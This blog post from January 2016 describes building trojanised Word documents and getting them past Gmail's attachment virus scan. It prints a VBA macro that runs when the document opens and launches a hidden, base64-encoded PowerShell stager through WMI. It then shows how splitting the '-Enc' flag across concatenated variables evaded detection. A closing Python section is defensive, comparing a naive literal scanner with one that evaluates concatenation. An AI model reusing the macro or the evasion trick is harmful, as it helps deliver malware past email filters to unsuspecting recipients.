Bypassing Gmail Attachment Virus Check
Bypass Gmail's Attachment Virus Check for PowerShell Macros
Note: This was posted in January 2016
So today, whilst practising creating trojanised Microsoft Word documents, I came across an issue: Gmail runs a virus check on attachments by default, which gets in the way if you want to send a malicious attachment out.
To insert a payload into the Word document, I first created a template which looked like the one below.
After doing so, creating the macro using AutoOpen and Document_Open was trivial. I made use of a PowerShell one-liner payload along with WMI process creation to launch powershell.exe with an encoded payload. Using PowerShell Empire's default copy-and-paste macro stager, this is detected.
Sample payload:
Sub AutoOpen()
    Debugging
End Sub

Sub Document_Open()
    Debugging
End Sub

Public Function Debugging() As Variant
    Dim Str As String
    ' Base64-encoded PowerShell command line, built up by concatenation
    Str = "powershell.exe -NoP -NonI -W Hidden -Enc JAB3AGMAP"
    Str = Str + "QBOAGUAVwAtAE8AYgBKAGUAQwB0ACAAUwB5AFMAVABlAE0ALgB"
    ' <snip to save space and sensitivity>
    Str = Str + "ATwBJAG4AJwAnACkA"
    Const HIDDEN_WINDOW = 0
    strComputer = "."
    ' Start the process through WMI with a hidden window
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objStartup = objWMIService.Get("Win32_ProcessStartup")
    Set objConfig = objStartup.SpawnInstance_
    objConfig.ShowWindow = HIDDEN_WINDOW
    Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    objProcess.Create Str, Null, objConfig, intProcessID
End Function
What I did was remove lines of code one at a time, re-uploading the document as a Gmail attachment each time, until Gmail no longer detected it as a virus.
I adjusted the payload to identify which string or pattern the AV was picking up, and quickly realised that the trigger was the "-Enc" in the payload.
To resolve this, I split the "-Enc" string into "-E" and "nc" and then concatenated the two together. For example:
Dim Yops As String
Yops = "powershell.exe -Enc PAYLOADHERE"
This would be translated to the following:
Dim Yops As String
Yops = "powershell.exe -E"
Yops = Yops + "nc PAYLOADHERE"
However, this technique did not work. My next thought was that the "Yops" string is checked at the end, after all the concatenation, to determine whether "powershell.exe" is followed by "-Enc". Therefore I did the following, and it bypassed the virus checks.
Dim Yops As String
Yops = "powershell.exe -E"
Yolo = "nc PAYLOAD"
Yops = Yops + Yolo + "HERE"
This quickly bypassed the antivirus feature on Gmail’s attachments and I was able to send the payload to my other machine for testing.
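From the defender's side, the three variants above show why a scanner that matches each string literal on its own is weak: the full command line only exists after the macro's concatenations run. As an added example (not the author's code), the Python below contrasts a literal-only scan with one that first resolves straight-line VBA string assignments (literals, identifiers, + and &) and then matches the combined value; the VBA fragments are constructed to mirror the three variants in the post, and the -Enc pattern is the one the post identifies as the trigger.

```python
import re

# Constructed VBA fragments modelled on the three variants in the post.
DIRECT = '''Dim Yops As String
Yops = "powershell.exe -Enc PAYLOADHERE"'''
SPLIT_SAME_VAR = '''Dim Yops As String
Yops = "powershell.exe -E"
Yops = Yops + "nc PAYLOADHERE"'''
SPLIT_VIA_TEMP = '''Dim Yops As String
Yops = "powershell.exe -E"
Yolo = "nc PAYLOAD"
Yops = Yops + Yolo + "HERE"'''

LITERAL = r'"(?:[^"]|"")*"'                       # VBA string literal; "" escapes a quote
TERM = rf'(?:{LITERAL}|[A-Za-z_]\w*)'             # a literal or an identifier
ASSIGN_RE = re.compile(rf'^\s*([A-Za-z_]\w*)\s*=\s*({TERM}(?:\s*[+&]\s*{TERM})*)\s*$')
TOKEN_RE = re.compile(rf'({LITERAL})|([A-Za-z_]\w*)')
# powershell followed on the same command line by -Enc / -EncodedCommand
# (a production rule would also cover the -e and -ec shorthands)
SUSPICIOUS_RE = re.compile(r'powershell(?:\.exe)?\b.*\s-enc(?:odedcommand)?\b', re.I)

def literal_hits(vba):
    """Naive scan: test the pattern against each string literal in isolation."""
    return [lit for lit in re.findall(LITERAL, vba) if SUSPICIOUS_RE.search(lit)]

def resolve_strings(vba):
    """Straight-line evaluation of VBA string assignments. Identifiers are
    case-insensitive as in VBA; unknown identifiers resolve to the empty string."""
    env = {}
    for line in vba.splitlines():
        m = ASSIGN_RE.match(line)
        if not m:
            continue  # Dim, Set, Const, method calls: not plain string assignments
        name, rhs = m.group(1).lower(), m.group(2)
        parts = []
        for lit, ident in TOKEN_RE.findall(rhs):
            if lit:
                parts.append(lit[1:-1].replace('""', '"'))
            else:
                parts.append(env.get(ident.lower(), ""))
        env[name] = "".join(parts)
    return env

def resolved_hits(vba):
    """Scan the fully concatenated values rather than the individual literals."""
    return {v: s for v, s in resolve_strings(vba).items() if SUSPICIOUS_RE.search(s)}

if __name__ == "__main__":
    for label, src in [("direct", DIRECT), ("split", SPLIT_SAME_VAR), ("temp", SPLIT_VIA_TEMP)]:
        print(label, "literal:", literal_hits(src), "resolved:", resolved_hits(src))
```

Only the direct variant trips the literal-only scan, while all three resolve to the same command line and are caught once concatenation is evaluated first.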